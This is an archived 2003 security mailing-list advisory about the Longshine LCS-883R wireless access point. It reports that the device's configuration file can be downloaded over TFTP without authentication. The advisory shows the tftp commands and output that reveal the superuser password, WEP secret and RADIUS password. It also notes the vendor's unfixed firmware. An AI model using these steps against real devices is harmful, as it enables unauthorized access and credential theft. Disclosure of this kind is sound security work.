Back to list
Longshine WLAN Access-Point LCS-883R VU#310201
Jan 06 2003 10:52AM
Lukas Grunwald (lukas dnx de)
Hardware: Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps
Software: ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc.
Description: Get Superuser Privileges and view the devices password and password and other passwords
Versions affected: tested with 03.01.0b and 03.01.0h
Vendor contacted: e-mailed Longshine at Sun Dec 29
Details: You are able to connect via tftp to the access-point an you can get download the configuration
without authentication the WEP Secret for the encryption and the password from your radius server is also readable.
In this configuration in the Username of the Superuser and the corresponding password stored.
The WEP Secret for the encryption and the password from your radius server is also readable.
This "attack" works via WLAN (!!!) and Ethernet.
tftp> connect 192.168.108.48
tftp> get config.img
Received 780 bytes in 1.0 seconds
DNXLABAP01 <- name of the AP
root <- name of the superuser
XXXXXX123 <- password from superuser
DNXLABLAN <- ssid
secu9 <- secret for WEP
You are also able to get the following files:
Solution: after contact with the vendor he claims that a new firmware-upgrade
fixes this problem, but the latest available firmware on his web-page
dosn't fix it anyway.
LONGSHINE Technologie (Europe) GmbH
An der Strusbek 9
Tel: ++ 49 ( 0 ) 4102 / 4922- 0
Fax: ++ 49 ( 0 ) 4102 / 40109
support (at) longshine (dot) de [email concealed]
Lukas Grunwald aka REG lg1
DN-Systems Enterprise Internet Solutions GmbH
[ reply ]
Re: Longshine WLAN Access-Point LCS-883R VU#310201
Jan 06 2003 06:57PM
heydowns borg com
Copyright 2010, SecurityFocus